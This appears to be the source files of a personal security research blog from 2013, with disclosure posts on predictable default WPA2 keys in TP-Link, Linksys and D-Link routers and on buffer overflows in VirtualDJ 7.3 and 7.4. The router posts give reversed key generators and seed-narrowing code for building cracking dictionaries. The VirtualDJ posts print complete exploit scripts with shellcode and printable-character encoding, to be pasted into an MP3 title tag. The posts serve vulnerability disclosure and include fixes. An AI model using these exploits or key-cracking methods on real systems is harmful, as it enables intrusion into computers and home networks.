52 |
53 |
54 |
60 |
61 |
62 |
--------------------------------------------------------------------------------
/posts/2013-03-08-wpa2-vulnerability-tplink/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-03-08
4 | title: WPA2 Key Generation Vulnerability: TP-Link
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | These days I have been playing with my new WLAN router, a [TP-Link TD-W8970](http://www.tp-link.com/en/products/?categoryid=203), and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key `TP-LINK_XXXXXX`. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range `[0-9A-Z]` and randomly generated by the [EasySetupAssistant](http://www.tp-link.com/mx/support/download/?model=TD-W8970&version=V1#tbl_b).
9 |
10 | Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a [linear congruential generator](http://en.wikipedia.org/wiki/Linear_congruential_generator) reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:
11 |
12 | ```python
13 | chars = "2345678923456789ABCDEFGHJKLMNPQRSTUVWXYZ"
14 | def gen(seed, length): #length=10 in WPA/WPA2, length=13 in WEP
15 | key = ""
16 | for i in range(length):
17 | seed = (seed * 0x343FD) + 0x269EC3
18 | key += chars[((seed >> 0x10) & 0x7FFF) % 0x28]
19 | return key
20 | ```
21 |
22 | Furthermore, note how the for any `length` and 32-bit integer seed `k` following condition holds: `gen(k, length) == gen(k + 0x80000000, length)`. This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 231 / 20000 seconds = 1.24 days.
23 |
24 | There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure [PRNG](https://en.wikipedia.org/wiki/Pseudorandom_number_generator). Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via `GetSystemTimeAsFileTime` from `Kernel32.dll`. The corresponding code to generate a seed at a given moment is:
25 |
26 | ```python
27 | import datetime
28 |
29 | def genSeed(currentTime):
30 | dt = currentTime - datetime.datetime(1601, 1, 1, 0, 0, 0)
31 | t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10
32 |
33 | tA = (t / 2**32 + 0xFE624E21)
34 | tB = (t % 2**32 + 0x2AC18000) % (1 << 32)
35 |
36 | if tA >= (1 << 32):
37 | tA += 1
38 | tA %= (1 << 32)
39 |
40 | r = (tA % 0x989680) * (2**32)
41 | r = ((r + tB) / 0x989680) % (2**32)
42 | return r
43 |
44 | print genSeed(datetime.datetime.utcnow())
45 | ```
46 |
47 | If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between `0x4EFFA3AD` y `0x50E22700`:
48 |
49 | ```python
50 | genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0)) # 0x4EFFA3AD
51 | genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0)) # 0x50E22700
52 | ```
53 |
54 | At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.
55 |
56 | Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:
57 |
58 | * Detecting the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market.
59 | * Discard any seeds corresponding to *strange* hours. For instance, it is pretty unlikely someone sets up their router at 2 AM and 6 AM.
60 |
61 | ## Affected routers
62 |
63 | I have verified all setup assistants distributed with TP-Link routers and all *TL-WA*, *TL-WR*, *TL-WDR* series and *TD-WXXXX*, *TD-VGXXXX* models are affected. In about 10% of these routers I wasn't able to download the *EasySetupAssistant* through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them.
64 |
65 | The complete list of affected routers is:
66 |
67 | * TL-W8151N (V1, V3)
68 | * TL-WA730RE (V1, V2*)
69 | * TL-WA830RE (V1, V2*)
70 | * TL-WDR3500
71 | * TL-WDR3600
72 | * TL-WDR4300
73 | * TL-WR720N
74 | * TL-WR740N (V1, V2, V3, V4)
75 | * TL-WR741ND (V1, V2, V3*, V4)
76 | * TL-WR841N (V1*, V5, V7, V8)
77 | * TL-WR841ND (V3, V5, V7, V8*)
78 | * TL-WR842ND
79 | * TL-WR940N (V1, V2)
80 | * TL-WR941ND (V2, V3, V4, V5)
81 | * TL-WR1043N
82 | * TL-WR1043ND
83 | * TD-VG3511 (V1*)
84 | * TD-VG3631
85 | * TD-W8901N
86 | * TD-W8950ND
87 | * TD-W8951NB (V3*, V4, V5)
88 | * TD-W8951ND (V1, V3, V4, V5)
89 | * TD-W8960N (V1, V3, V4)
90 | * TD-W8961NB (V1, V2, V3*)
91 | * TD-W8961ND
92 | * TD-W8968
93 | * TD-W8970
94 |
95 | ## Resources
96 |
97 | * __TPLink-CheckKeys__: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a.
98 |
99 | * __TPLink-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8.
100 |
101 | * __TPLink-GenKeys__: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in `./output.txt`. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68.
102 |
103 | ## Solutions
104 |
105 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/random` or `/dev/urandom` in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
106 | * If for some reason you want to use seeds for generating keys:
107 | * Make them bigger than 32-bit. Just 2^32 keys are easy to check.
108 | * Obtain them from a cryptographically secure PRNG.
109 | * If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
110 |
--------------------------------------------------------------------------------
/posts/2013-03-08-wpa2-vulnerability-tplink/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | WPA2 Key Generation Vulnerability: TP-Link
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
These days I have been playing with my new WLAN router, a TP-Link TD-W8970, and I have found a particularly interesting issue that affects other TP-Link routers as well. These routers can be recognized by the ESSID key TP-LINK_XXXXXX. Their default key for WPA/WPA2 and WEP is 10 and 13 characters in length respectively, apparently in range [0-9A-Z] and randomly generated by the EasySetupAssistant.
74 |
Based on this, the corresponding handshake of such a WPA/WPA2 key, bruteforced with typical GPU speeds of 20000 keys / second, would require 36^10 / 20000 seconds = 182807922003.1488 seconds = 5796.8011 years to be cracked. However, by disassembling the setup assistant, I realized this key is generated from a 32-bit seed by following a linear congruential generator reducing our key set from 36^10 keys to 2^32 keys. The reversed generator is:
Furthermore, note how the for any length and 32-bit integer seed k following condition holds: gen(k, length) == gen(k + 0x80000000, length). This reduces the keys to check to 2^31. At the previously mentioned computing speed, this implies finding such a key in 231 / 20000 seconds = 1.24 days.
86 |
There is an additional issue affecting the seed generation that can help reducing the password dictionaries even more. These 32-bit seeds are not the result of a cryptographically secure PRNG. Instead they just represent a time difference, growing linearly at a rate of 1 every second as the system time passes. In Windows, the system time is obtained via GetSystemTimeAsFileTime from Kernel32.dll. The corresponding code to generate a seed at a given moment is:
If we can estimate the time interval in which the router was installed, we can reduce the total seeds from 2^31 to the seeds that could be generated in that specific time interval. For instance, if we are confident that such a router was installed during 2012, we would only have to check the keys corresponding to seeds between 0x4EFFA3AD y 0x50E22700:
At the previously mentioned speed, we could potentially crack the password in a worst-case time of (0x50E22700 - 0x4EFFA3AD) / 20000 seconds = 26.35 minutes.
115 |
Since guessing the time in which the setup assistant configured the router can help us reduce the time required to find the key, we could improve our dictionary in the following ways:
116 |
117 |
Detecting the WLAN router series and model, if possible, and compare it with a database of release dates in order to discard any seed corresponding to dates in which the router was not on the market.
118 |
Discard any seeds corresponding to strange hours. For instance, it is pretty unlikely someone sets up their router at 2 AM and 6 AM.
119 |
120 |
Affected routers
121 |
I have verified all setup assistants distributed with TP-Link routers and all TL-WA, TL-WR, TL-WDR series and TD-WXXXX, TD-VGXXXX models are affected. In about 10% of these routers I wasn't able to download the EasySetupAssistant through the link TP-Link provided, but I am confident enough that the results of same routers of the series can be extrapolated to them.
122 |
The complete list of affected routers is:
123 |
124 |
TL-W8151N (V1, V3)
125 |
TL-WA730RE (V1, V2*)
126 |
TL-WA830RE (V1, V2*)
127 |
TL-WDR3500
128 |
TL-WDR3600
129 |
TL-WDR4300
130 |
TL-WR720N
131 |
TL-WR740N (V1, V2, V3, V4)
132 |
TL-WR741ND (V1, V2, V3*, V4)
133 |
TL-WR841N (V1*, V5, V7, V8)
134 |
TL-WR841ND (V3, V5, V7, V8*)
135 |
TL-WR842ND
136 |
TL-WR940N (V1, V2)
137 |
TL-WR941ND (V2, V3, V4, V5)
138 |
TL-WR1043N
139 |
TL-WR1043ND
140 |
TD-VG3511 (V1*)
141 |
TD-VG3631
142 |
TD-W8901N
143 |
TD-W8950ND
144 |
TD-W8951NB (V3*, V4, V5)
145 |
TD-W8951ND (V1, V3, V4, V5)
146 |
TD-W8960N (V1, V3, V4)
147 |
TD-W8961NB (V1, V2, V3*)
148 |
TD-W8961ND
149 |
TD-W8968
150 |
TD-W8970
151 |
152 |
Resources
153 |
154 |
155 |
TPLink-CheckKeys: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/?oyrnt45sljlxa5a.
156 |
157 |
158 |
TPLink-GenSeeds: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: http://www.mediafire.com/download.php?44l9629qq1dx2l8.
159 |
160 |
161 |
TPLink-GenKeys: Choose key type, the seed range which can be calculated with the previous tool. Information about dictionary to be generated will be given, accept to generate it in ./output.txt. Download: http://www.mediafire.com/download.php?28z2fvdgpf22s68.
162 |
163 |
164 |
Solutions
165 |
166 |
Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as /dev/random or /dev/urandom in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by CryptGenRandom in Advapi32.dll.
167 |
If for some reason you want to use seeds for generating keys:
168 |
Make them bigger than 32-bit. Just 2^32 keys are easy to check.
169 |
Obtain them from a cryptographically secure PRNG.
170 |
If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
171 |
172 |
173 |
174 |
180 |
181 |
182 |
--------------------------------------------------------------------------------
/posts/2013-03-30-virtualdj-73-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-03-30
4 | title: VirtualDJ Pro/Home 7.3: Buffer Overflow
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.3 and VirtualDJ Home 7.3](http://www.virtualdj.com/) and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as _Title_, _Album_, and _Artist_ and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters `[A-Z]` from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the `retn` instruction, the `edi` register points to the first buffer.
9 |
10 | We cannot assign the `eip` the address of the first buffer directly since it contains characters which are not in range A-Z. However if we take into account the previous information, we can do this indirectly: We write in the bytes 4100:4104 of the title `"FSFD"`. After the buffer overflows occurs we get `eip == 0×44465346 == "FSFD"`. At this address (inside _urlmon.dll_) we find a `call edi` instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (`retn`) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing into the stack the bytes of the shellcode using only printable ASCII characters. Let me explain:
11 |
12 | Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string `"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"`:
13 |
14 | ```asm
15 | and eax, 40404040h ; 25 40 40 40 40 == "%@@@@"
16 | and eax, 3F3F3F3Fh ; 25 3F 3F 3F 3F == "%????" <– eax == 0
17 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@"
18 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@"
19 | sub eax, 40444052h ; 2D 40 44 40 52 == "-R@D@"
20 | sub eax, 3F433F52h ; 2D 3F 43 3F 52 == "-R?C?" <– eax == 0xFFEFFFB8
21 | push eax ; 50 == "P"
22 | ```
23 |
24 | Once all the bytes of the shellcode are pushed into the stack (in inverse order) we use `push esp` (0×54) and `retn` (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ pushes another 0xC3 byte before this one.
25 |
26 | This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to spread quickly a malware just by uploading a malicious MP3 file in a popular site. Even worse, this file might not be a suspicious file for antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces.
27 |
28 | ```python
29 | #Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability
30 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com
31 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0
32 |
33 | import string
34 |
35 | def unicodeHex(c):
36 | c = hex(ord(c))[2:].upper()
37 | if len(c)==1: c = "0"+c
38 | return c+"00"
39 |
40 | def movEAX(s):
41 | #Arrays
42 | s = map(ord, list(s))
43 | inst = []
44 | target = [512, 512, 512, 512]
45 | carry = [0,-2,-2,-2]
46 | for i in range(4):
47 | if s[i] < 0x10:
48 | target[i] = 256
49 | if i < 3:
50 | carry[i+1] = -1
51 | diff = [target[b] - s[b] for b in range(4)]
52 |
53 | #Gen instructions
54 | for i in range(3):
55 | target = [target[b] - diff[b]/4 for b in range(4)]
56 | inst += [[diff[b]/4 for b in range(4)]]
57 | target = [target[b] - s[b] + carry[b] for b in range(4)]
58 | inst += [target]
59 |
60 | #Remove characters '[','\',']'
61 | for b in range(4):
62 | if ord("[") in [inst[i][b] for i in range(4)] or \
63 | ord("\\") in [inst[i][b] for i in range(4)] or \
64 | ord("]") in [inst[i][b] for i in range(4)]:
65 | for i in range(4):
66 | inst[i][b] = inst[i][b] + 5*((-1)**(i))
67 |
68 | inst = ["\x2D" + "".join(map(chr, i)) for i in inst]
69 | return "".join(inst)
70 |
71 | #Shellcode: Run cmd.exe
72 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
73 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
74 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
75 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
76 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
77 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2
78 | shellcode += retAddress
79 |
80 | while len(shellcode) % 4 != 0:
81 | shellcode += '\x90'
82 | exploit = ""
83 | for i in range(0,len(shellcode),4)[::-1]:
84 | exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F" #EAX = 0
85 | exploit += movEAX(shellcode[i:i+4]) #EAX = shellcode[i:i+4]
86 | exploit += "\x50" #PUSH EAX
87 | exploit += '\x54\xC3' #PUSH ESP; RETN
88 |
89 | c = 0
90 | for i in exploit:
91 | if i in string.ascii_letters:
92 | c += 1
93 | exploit += "A" * (4100 - c)
94 | exploit += "FSFD"
95 |
96 | print exploit
97 | #Paste the generated code in the tag 'Title' of the MP3 file.
98 | ```
99 |
100 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0.
101 |
102 | ## Log
103 |
104 | * __2012-11-29__: Bug discovered. VirtualDJ was emailed about this a few days later.
105 | * __2013-03-20__: Bug fixed with the release of VirtualDJ Pro/Home 7.4.
106 | * __2013-03-29__: Exploit published.
107 |
--------------------------------------------------------------------------------
/posts/2013-03-30-virtualdj-73-buffer-overflow/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | VirtualDJ Pro/Home 7.3: Buffer Overflow
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
I have found a buffer overflow vulnerability in VirtualDJ Pro 7.3 and VirtualDJ Home 7.3 and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as Title, Album, and Artist and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters [A-Z] from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the retn instruction, the edi register points to the first buffer.
74 |
We cannot assign the eip the address of the first buffer directly since it contains characters which are not in range A-Z. However if we take into account the previous information, we can do this indirectly: We write in the bytes 4100:4104 of the title "FSFD". After the buffer overflows occurs we get eip == 0×44465346 == "FSFD". At this address (inside urlmon.dll) we find a call edi instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (retn) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing into the stack the bytes of the shellcode using only printable ASCII characters. Let me explain:
75 |
Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string "%@@@@%????-R@D@-R@D@-R@D@-R?C?P":
Once all the bytes of the shellcode are pushed into the stack (in inverse order) we use push esp (0×54) and retn (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ pushes another 0xC3 byte before this one.
87 |
This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to spread quickly a malware just by uploading a malicious MP3 file in a popular site. Even worse, this file might not be a suspicious file for antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces.
You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0.
161 |
Log
162 |
163 |
2012-11-29: Bug discovered. VirtualDJ was emailed about this a few days later.
164 |
2013-03-20: Bug fixed with the release of VirtualDJ Pro/Home 7.4.
165 |
2013-03-29: Exploit published.
166 |
167 |
168 |
169 |
175 |
176 |
177 |
--------------------------------------------------------------------------------
/posts/2013-03-31-wpa2-vulnerability-linksys-dlink/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-03-31
4 | title: WPA2 Key Generation Vulnerability: Linksys / D-Link
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | After finding the [TP-Link WPA2 Key Generation Vulnerability](../2013-03-08-wpa2-vulnerability-tplink/), I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers user nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here.
9 |
10 | This time, the vulnerability affects the **Linksys EasyLink Advisor** and **D-Link Quick Setup Wizard** assistants, both based in *Network Magic*, a software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants.
11 |
12 | The reversed generator is:
13 |
14 | ```python
15 | blacklist_windows = "1I2Z0O5SUV"
16 | blacklist_macosx = "B8DO0I1S5UVZ2"
17 | blacklist = blacklist_windows # Change me
18 |
19 | def gen(seed):
20 | key = ""
21 | for i in range(10):
22 | while True:
23 | seed = ((seed * 0x343FD) + 0x269EC3) % (2**32)
24 | edx = ((seed >> 0x10) & 0x7FFF) % 0x24
25 | if edx >= 0xA:
26 | edx += 0x37
27 | else:
28 | edx += 0x30
29 | if chr(edx) not in blacklist:
30 | key += chr(edx)
31 | break
32 | return key
33 | ```
34 |
35 | The seeds used by this function are obtained in the exactly same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a *whitelist*, it adds random characters in range `[0-9A-Z]`, filtering out those found in a hardcoded *blacklist*, meant to prevent adding visually similar characters such as '`0`' and '`O`' to the key.
36 |
37 | As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.
38 |
39 |
40 | ## Affected routers
41 |
42 | The complete list of affected Linksys routers is:
43 |
44 | * WAP610N (Blacklisted characters on Windows assistant: `"1I2Z0O5SUVB8"`)
45 | * WRT110
46 | * WRT120N
47 | * WRT160N (V1, V2, V3)
48 | * WRT160N-HP (V1*)
49 | * WRT160NL
50 | * WRT310N (V1, V2)
51 | * WRT320N
52 | * WRT400N
53 | * WRT54G2
54 | * WRT610N (V1*, V2)
55 |
56 | The complete list of affected D-Link routers is:
57 |
58 | * DGL-4100
59 | * DGL-4300
60 | * DIR-615 (not all revisions)
61 | * DIR-625
62 | * DIR-635
63 | * WBR-1310
64 | * WBR-1310 Rev. B
65 | * WBR-2310
66 |
67 |
68 | ## Resources
69 |
70 | * __Linksys-CheckKeys__: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: [http://www.mediafire.com/download.php?pmqt9aykwxhwkto](http://www.mediafire.com/download.php?pmqt9aykwxhwkto).
71 | * __Linksys-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: [http://www.mediafire.com/download.php?kpe7844kqd9bk4j](http://www.mediafire.com/download.php?kpe7844kqd9bk4j).
72 | * __Linksys-GenKeys__: Generate a key dictionary by specifying a seed interval. Download: [http://www.mediafire.com/download.php?2h9y0pkay9id1rt](http://www.mediafire.com/download.php?2h9y0pkay9id1rt).
73 |
74 |
75 | ## Solutions
76 |
77 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/urandom` in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
78 | * If for some reason you want to use seeds for generating keys:
79 | * Make them bigger than 32-bit. Just 2^32 keys are easy to check.
80 | * Obtain them from a cryptographically secure PRNG.
81 | * If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
82 |
--------------------------------------------------------------------------------
/posts/2013-03-31-wpa2-vulnerability-linksys-dlink/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | WPA2 Key Generation Vulnerability: Linksys / D-Link
8 |
9 |
10 |
11 |
51 |
52 |
53 |
54 |
After finding the TP-Link WPA2 Key Generation Vulnerability, I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers user nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here.
74 |
This time, the vulnerability affects the Linksys EasyLink Advisor and D-Link Quick Setup Wizard assistants, both based in Network Magic, a software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants.
The seeds used by this function are obtained in the exactly same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a whitelist, it adds random characters in range [0-9A-Z], filtering out those found in a hardcoded blacklist, meant to prevent adding visually similar characters such as '0' and 'O' to the key.
98 |
As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.
99 |
Affected routers
100 |
The complete list of affected Linksys routers is:
101 |
102 |
WAP610N (Blacklisted characters on Windows assistant: "1I2Z0O5SUVB8")
103 |
WRT110
104 |
WRT120N
105 |
WRT160N (V1, V2, V3)
106 |
WRT160N-HP (V1*)
107 |
WRT160NL
108 |
WRT310N (V1, V2)
109 |
WRT320N
110 |
WRT400N
111 |
WRT54G2
112 |
WRT610N (V1*, V2)
113 |
114 |
The complete list of affected D-Link routers is:
115 |
116 |
DGL-4100
117 |
DGL-4300
118 |
DIR-615 (not all revisions)
119 |
DIR-625
120 |
DIR-635
121 |
WBR-1310
122 |
WBR-1310 Rev. B
123 |
WBR-2310
124 |
125 |
Resources
126 |
127 |
Linksys-CheckKeys: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: http://www.mediafire.com/download.php?pmqt9aykwxhwkto.
Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as /dev/urandom in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by CryptGenRandom in Advapi32.dll.
134 |
If for some reason you want to use seeds for generating keys:
135 |
Make them bigger than 32-bit. Just 2^32 keys are easy to check.
136 |
Obtain them from a cryptographically secure PRNG.
137 |
If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess.
138 |
139 |
140 |
141 |
147 |
148 |
149 |
--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: post
3 | date: 2013-04-20
4 | title: VirtualDJ Pro/Home 7.4: Buffer Overflow
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.4 and VirtualDJ Home 7.4](http://www.virtualdj.com/) and possibly previous versions of this software. After right-clicking a file and entering the "_File Infos_" > "_Cover..._" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: `"http://images.google.com/images?q=X"` where `X` corresponds to the ID3 tag _Title_. Special characters of this tag are ignored, and any sequence of symbols (e.g. `' '`, `'-'`, `'_'`) is replaced with `'+'`. The problem is [once again](../2013-03-30-virtualdj-73-buffer-overflow/) that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.
9 |
10 | To exploit this vulnerability, I searched for a `call esp` instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, `"dLMD"`. After entering this call, all the bytes after the _Fake Title_ + _Spaces_ + _Padding_ + `"dLMD"` will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range `[0-9A-Za-z]`. For this purpose I used a function from [ALPHA3](http://code.google.com/p/alpha3/). After that, the original shellcode will be decoded and executed.
11 |
12 | ```python
13 | #Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability
14 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com
15 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q
16 |
17 | def encodeData(decoder, data, validValues):
18 | assert data.find("\0") == -1, "Shellcode must be NULL free"
19 | data += "\0" #End of shellcode
20 | encData = decoder[-2:]
21 | decoder = decoder[:-2]
22 | for p in range(len(data)):
23 | dByte = ord(data[p])
24 | pxByte = ord(encData[p+1])
25 | bx, by = encoder(dByte ^ pxByte, validValues)
26 | encData += chr(bx) + chr(by)
27 | return decoder + encData
28 |
29 | def encoder(value, validValues):
30 | for bx in validValues:
31 | imul = (bx * 0x30) & 0xFF
32 | for by in validValues:
33 | if imul ^ by == value: return [bx, by]
34 |
35 |
36 | #Shellcode (e.g. run cmd.exe)
37 | shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
38 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
39 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
40 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
41 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
42 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2
43 | shellcode += retAddress
44 |
45 | #Arguments
46 | fakeTitle = "Greatest Hits of the Internet - Nyan Cat"
47 | while fakeTitle[0] == " ": fakeTitle = fakeTitle[1:]
48 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1]
49 | for i in fakeTitle:
50 | if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -":
51 | raise "Invalid characters in the fake title"
52 | fakeTitle2 = fakeTitle.replace("-"," ")
53 | while " " in fakeTitle2: fakeTitle2 = fakeTitle2.replace(" "," ")
54 |
55 | #Exploit
56 | exploit = fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1)
57 | exploit += "dLMD" #RETN address
58 | exploit += "XXAI" #ESP := Baseaddr of encoded payload
59 | exploit += encodeData(
60 | "TYhffffk4diFkDql02Dqm0D1CuEE", #Baseaddr of encoded payload := ESP
61 | shellcode,
62 | map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"))
63 | )
64 |
65 | print exploit
66 | #Paste the generated code in the tag 'Title' of the MP3 file.
67 | ```
68 |
69 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.
70 |
